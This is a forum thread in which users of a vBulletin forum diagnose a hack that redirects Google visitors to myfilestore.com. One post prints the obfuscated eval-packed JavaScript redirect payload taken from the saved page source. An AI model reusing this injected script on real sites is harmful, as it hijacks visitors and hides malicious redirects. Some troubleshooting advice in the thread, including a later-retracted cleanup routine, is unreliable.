Security Issue?

[Pheary]

I have appeared to be getting re-directed to myfilestore.com when clicking on links to this forum from Google.

I found a thread here relating to the problem:
Security issue - vBulletin SEO Forums

Page 3 mentions myfilestore:

On another note, we have 4 web servers running behind a load balancer - each one keeping its own set of Apache logfiles. I erased the logs completely on Saturday and then we got hit again on Sunday so it was relatively easy to scan through all of the logs to see if there was anything interesting. Nothing there. Nada. At least, nothing that caught my eye. This appears to be a SQL injection directly into my datastore table in the vB database that loads the famous eval(base64_decode()); code that redirects to the myfilestore.com site. This time there did not appear to be anything in my vbseo plugin's global_start hook, though it did appear there once in the past as well. I searched for catch phrases like eval, base64, etc. an returned nothing. Any other ideas? I'm still semi-convinced this is happening through vBSEO, somehow.

I have limited understanding of vBulletin although I can be 100% sure this isn't related to my PC. As it has happened on a couple of other base stations I have here.

I apologise if this has already been mentioned, although using the search string for myfilestore - I was unable to find any entries.

Regards,

 

[whiskey]

I don't believe anyone has mentioned this yet but I was waiting to see if it was just me...I too get redirected to this myfilestore. What if any dangers will it pose to our computers & I wonder if admistration should be notified of this!

 

[jwquantrell]

Yup, same thing has been happening to me lately.

 

[thelook]

Same thing happens to me, it just started doing this a few days ago for me.

 

[vaporgalinfla]

This has been happening to me as well. Started in the past few days...

 

[whiskey]

I went to the link the op put up & read a few things people were posting on that forum & it sounds pretty scary..should we be changing all our passwords on all things too? I'm not a techno person but should we be concerned?

 

[Kimmy]

been happening to me too

 

[muttSRT]

me too last 3 or 4 days

 

[whiskey]

Maybe one of ecf's computer wizz guys can chime in before this becomes a HUGE frantic free for all?

 

[whiskey]

Bump,Bump??

 

[Pheary]

I'm not a techno person but should we be concerned?

The concern is that about 50% of traffic from Google is being re-directed to another website. This will have no impact on password protection and stuff like that. Basically it is a targeted attack on a specific thing done via some form of loophole. This loophole doesn't allow them to do seriously scary things, but this alone is pretty bad.

Although I have only noticed it today and yesterday, so I guess there is a chance this is a new attack and not something that has been going on over a long period of time. Perhaps if other people have come across this they could post when was the earliest time they spotted it.

 

[whiskey]

I started noticing it end of last week. I have pm'ed a moderator to check this thread out and a couple computer wiz guys for their in put just to be safe...We'll see. Thanks Phearfactor for the heads up.

 

[Kula]

Happening to me too

I thought I had malware on my system - ran six different scans but no reults. I reported it to google.

It was only tonight that I did a bit of googling and noticed some other posts about this issue on other forums.

Has anyone from ECF said anything about it?

 

[ejoker]

this is being looked into.

 

[Pheary]

Thanks for the update ejoker.

 

[smokum]

SEE EDIT NOTE BELOW !!


Its a known google virus that is widespread and not specific to ECF.

I picked it up myself about 1.5 weeks ago, and being a non tech'y person couldn't deal with whats involved to remove it.

** However, last nite I updated my windows and in particular this latest security update from microcrap: Windows Malicious Software Removal Tool - May 2010 (KB890830) and followed the routine since in found a problem.

When completed, I also deleted the windows "Prefetch" folder contents (only the contents NOT the folder), as well as going to my "system tools" and creating a new system restore point titled "CLEAN".

I then went to my system tools again and selected "Disk Cleanup" and hit the tab of that window called "More Options" and clicked the "clean up" button for System Restore (which will delete all but the latest restore point, ie: the one you just created called "clean".

After this I also updated and ran my spybot S&D as well as CrapCleaner (in particular with crapcleaner I ran the "registry integrity" tool and selected to REMOVE ALL and also selected to save the changes to a backup file in case something went wrong.

When completed, a rebooted my computer and I now no longer have this issue.

VapeOn,
Greg

I stand corrected.......... This is NOT the issue being raised by the OP, yet the correction for the Google redirect virus/malware OUTSIDE of ECF and the OP's findings.

I appologize for the confusion !!

 

[Pheary]

I have never had this happen on any other website, I find it extremely hard to believe that on several machines the only site affected is ECF but that is somehow related to a Google Virus.

I have seen similar malware that has done this, but that has been on every result of Google. What I am experiencing now is more like a 50/50 chance of going to another website on only the ECF results.

---

I have just recreated the issue fairly easily. I use Firefox most of the time, so I opened up I.E went to Google and searched "e-cig forum', top result is this forum, clicked it.. This is what I see.

If I go back on the history to the ecf page, it just re-directs me instantly to myfilehost. I did manage to get back to the page and saved it, here is what the source code of the page is.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0039)http://www.e-cigarette-forum.com/forum/ -->
<HTML><HEAD><META content="IE=7.0000" http-equiv="X-UA-Compatible">

<META content="text/html; charset=iso-8859-1" http-equiv=Content-Type>
<META name=GENERATOR content="MSHTML 8.00.7600.16535"></HEAD>
<BODY>here
<SCRIPT type=text/javascript>var vbsp='F80A58BA';eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('t a=["\\z\\b\\c\\n\\e\\j\\b","\\k\\b\\c\\n\\e\\j\\b","\\A\\x\\b\\L\\f\\e\\p\\b\\k\\i","\\c\\d\\K\\M\\n\\N\\c\\p\\e\\o\\z","\\q\\d\\d\\J\\e\\b","\\i","\\A\\x\\f\\s\\c\\l\\i\\g","\\D\\F\\k\\f","\\G","\\r\\d\\q\\s\\c\\e\\d\\o","\\l\\c\\c\\f\\H\\g\\g\\j\\P\\Q\\e\\r\\b\\k\\c\\d\\p\\b\\B\\q\\d\\j\\g\\m\\d\\R\\o\\r\\d\\s\\m\\B\\f\\l\\f\\S\\e\\m\\i"];E y(u,C){t h=I O();h[a[1]](h[a[0]]()+T);t w=a[2]+h[a[3]]();v[a[4]]=u+a[5]+C+w+a[6]};y(a[7],a[8]);v[a[9]]=a+V;',58,58,'||||||||||_0x987b|x65|x74|x6F|x69|x70|x2F|_0x414cx4|x3D|x6D|x73|x68|x64|x54|x6E|x72|x63|x6C|x61|var|_0x414cx2|document|_0x414cx5|x20|ipbcc|x67|x3B|x2E|_0x414cx3|x76|function|x62|x31|x3A|new|x6B|x47|x78|x4D|x53|Date|x79|x66|x77|x3F|86400000|10|vbsp'.split('|'),0,{}))</SCRIPT>
</BODY></HTML>

Now I went back to Google in I.E, searched again and now it is fine. It only seems to happen the first time, then for whatever reason it doesn't happen again. You can clearly see the code above though is somehow injected into ECF. It is not re-directing me from Google it is re-directing me from ECF, and it is not re-directing me based on my hosts file, it is actually coding in the website.

 

[smokum]

50/50 chance of redirects was MY issue also both on google search engine direct AND here on ECF (first result click took me to another search site, second result click took me where I wanted to go).

I tried to find the updated removal tools results page that listed the virus but am unable to find it (like I said, I'm a non tech'y person), but I remember that it said it was a WIN32 virus yet I can't remember the name of it.

Sorry I couldn't be more help and only shared what has worked for me.

-Greg

 

[Pheary]

Smokum just fire up a different Browser and see if you can get the same results I did (I modified my post above). I hope it is my machines that are affected as it will be a lot easier to fix than if the forum has an SQL injection issue.

 

[Kula]

Smokum just fire up a different Browser and see if you can get the same results I did (I modified my post above). I hope it is my machines that are affected as it will be a lot easier to fix than if the forum has an SQL injection issue.

I have had the issue for about 3 days now on three different systems (2 different networks). Yes there is the chance that all three systems are infected with a virus but as ECF is the only redirect I get I am sure the issue lies with ECF server(s).